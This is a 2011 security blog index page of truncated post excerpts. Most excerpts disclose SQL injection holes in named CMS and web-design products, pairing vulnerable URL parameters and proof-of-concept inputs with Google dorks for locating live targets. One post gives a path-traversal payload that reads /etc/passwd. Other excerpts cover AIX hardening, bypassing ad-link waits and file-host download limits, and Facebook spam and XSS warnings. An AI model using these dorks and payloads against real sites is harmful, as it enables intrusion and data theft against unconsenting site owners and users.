Wednesday, December 21, 2011

AIX IP Stack Tuning

Having problem during AIX Server Assessment/Hardening recently. After a few googles,found this great bloghttp://www.cymru.com helps a lot in my assessment. 1. TCP send and receive spaces The TCP send and receive spaces...

Monday, November 14, 2011

Wednesday, November 2, 2011

Saturday, October 22, 2011

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities Found : 22 October 2011 Web   : http://www.dreamsandideas.com [sql] 1 - products.php?CatID=[sql] 2 - news_details.php?nid=[sql] 3 - success_story_details.php?sid=[sql] 4...

Wednesday, October 12, 2011

Monday, August 22, 2011

Run the Application as Administrator Just by a Click!

How to Set Our Application to Always Running as Administrator in Windows 7 ----------------------------------------------------------------------------------------------------- 1 - Right click to the application that you...

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

Title : LASERnet CMS  Vulnerable to SQL Injection Vendor : http://cms.lasernet.gr/index.php?lang=en Dork : intext:"Powered by Lasernet" Category: WebApps http://localhost.com/index.php?id=[SQL] Demo: http://localhost.com/index.php ?id=-1'...

CarRentals CMS Vulnerable to SQL Injection

Title : CarRentals CMS Vulnerable to SQL Injection Vendor : N/A Dork : intext:"Powered by CarRentals CMS" Category: WebApps http://localhost.com/*.php?id=[SQL] ~/POC/~ ------- http://localhost.com/book-offer.php?offer_id=-1'...

Thursday, August 4, 2011

shoma.net Web Design Vulnerable to Multiple SQL Injection

Title : shoma.net Web Design Vulnerable to Multiple SQL Injection Website : http://www.shoma.net/ Dork : Developed by Shoma.net Type : WebApps http://localhost.com/SubNews.cfm?NewsID=[SQL] http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL] http://localhost.com/Hotellist.cfm?starID=[SQL] http://localhost.com/index_show.asp?idbasic=[SQL] http://localhost.com/index_view.asp?idrecipie=[SQL] There...

Tuesday, July 26, 2011

Tuesday, July 5, 2011

4shared Downloader

How to use? 1 - Make sure you have an account in 4shared.com..just a free account :) 2 - Login into your account 3 - Open command prompt and just run this python script :) Usage : 4shared.py Url 4 - It will open the...

Friday, July 1, 2011

Adf.ly Bypass

Hate to waiting even 5 secs? Want to bypass the waiting time? Its easy As example you want to download this http://adf.ly/1wuNcGo to the link,and at the url bar type this javascript:showSkip();The countdown will be skipped...

4shared Download Tricks

4shared Download Tricks So there are two tricks you can do to download file from 4shared.com Let say we want to download this thing. http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.htmlWe can 1 - bypassing...

Unix Command in Windows???

Unix Command in Windows??? Yeah,there's a little secret that might you dont know about Windows 7.We can use Unix command in Windows without using cygwin! believe it? Let's look it together. The name of this technology?...

Wednesday, June 15, 2011

Axel Accelarator for Windows

I google a bit and found someone that share this Axel accelarator for windows users. Download here. http://www.mediafire.com/?wi8dw1hbaqinhfz extract and just use it! usage like below Usage: axel.exe [options] url1 [url2]...

Monday, June 6, 2011

Friday, June 3, 2011

Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection

Title : Acuity CMS Vulnerable to Blind SQL Injection Found by : p0pc0rn Dork : intext:"Powered by Acuity CMS." Web : http://www.acuitycms.com/ SQL Injection ---------------- http://www.site.com/browse.asp?page=[Blind...

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection Found by : p0pc0rn Dork : intext:"Developed By : Golden IT Solutions" SQL Injection ---------------- http://www.site.com/anypath.php?ID=[SQL] POC ---- http://www.site.com/memProfile.php?ID=-2800...

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :) ------------------------- By p0pc0rn May 2011 Dork: inurl:"index.php?loc=subindex" Exploit : site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd thanks -p0pc0...

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook ------------------------------------------ If u notice a wallpost like this,NEVER EVER CLICK IT!! [spam]Not like Justin Biebier which always never say never.He's an idiot [/spam] Take...

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PosgreSQL Injection

Title : Creatop Web Design Vulnerable to PosgreSQL Injection Vendor: http://www.creatop.com.au/ Found : by p0pc0rn Dork : intext:"by Creatop" filetype:cfm PosgreSQL Injection ------------------- http://www.victim.com/index.cfm?MenuID=[Injection] Example: http://www.victim.com/index.cfm?MenuID=80...

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities

Title : PakCyber Web Design Multiple Vulnerabilities Found : by p0pc0rn Vendor: http://pakcyber.com/ Dork : intext:"Powered By PakCyber" Blind SQL Injection ------------------- http://www.victim.com/site.php?article_id=[Blindey] Eg:...

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection

Title : ezeXs Web Design Vulnerable to SQL Injection Web : http://www.ezexs.com/ By : p0pc0rn Dork : intext:"Powered by ezexs.com" Microsoft Access SQL Injection ------------------------------ http://site.com/[type].asp?[id]=[SQL] Notes...

Site Developed by Magfiroh Vulnerable to SQL Injection

Title : Site Developed by Magfiroh Vulnerable to SQL Injection Filetype : ColdFusion Found by : p0pc0rn Dork : inurl:".cfm?judul=" SQL --- http://site.com/parameter.cfm?judul=[SQL] POC --- http://site.com/download_detail.cfm?judul=1' Live...

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection

Title : eksi7 Web Design Vulnerable to Multiple SQL Injection Vendor: http://www.eksi7.com Found by : p0pc0rn Dork : inurl:"devam.asp?haber_id=" inurl:"kat_list.asp?kat_id=" intext:"tasarim ve programlama eksi7 web hizmetleri" intext:"design...

Monday, April 4, 2011

Sunday, April 3, 2011

Master Password in Firefox

Master Password in Firefox -------------------------- Some of us maybe stored password for some sites in our browser.SO.. It's really important to set your master password in firefox browser Why we need to set the master...

Tuesday, March 29, 2011

New XSS at m.facebook.com

So,noticed that there's a new XSS vulnerability found at facebook by someone. Figured out after saw my friend update his facebook status in Indonesian language. so,the what the attacker can do is when a victim click the...

Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities

Title : CAPSoft CMS Multiple Vulnerabilities Vendor : http://www.capsoft.com.ar Found by : p0pc0rn SQL --- Vulnerable Parameters are Method = GET ------------ http://site.com/noticia.asp?id=[SQL] http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL] http://site.com/product.asp?intProdID=[SQL] http://site.com/productosporcategoria.asp?intCatalogID=[SQL] POC --- http://site.com/noticia.asp?id=1...

Inventory Mojo Software Vulnerable to Multiple SQL Injections

Title : Inventory Mojo Software Vulnerable to Multiple SQL Injections Found by : p0pc0rn Dork : intext:"Powered by Inventory Mojo Software." SQL --- Vulnerable Parameters are Method = GET ------------ categoria.asp producto.asp srubro.asp marca.asp Method...

Sunday, March 20, 2011

Shimbi CMS Vulnerable to Multiple SQL Injections

Title : Shimbi CMS Vulnerable to Multiple SQL Injections Vendor : http://www.shimbi.in/ Found by : p0pc0rn Dork : intext:"Powered By Shimbi CMS" SQL Injection in details.php parameter --------------------------------------- http://site.com/details.php?id=[sql] POC...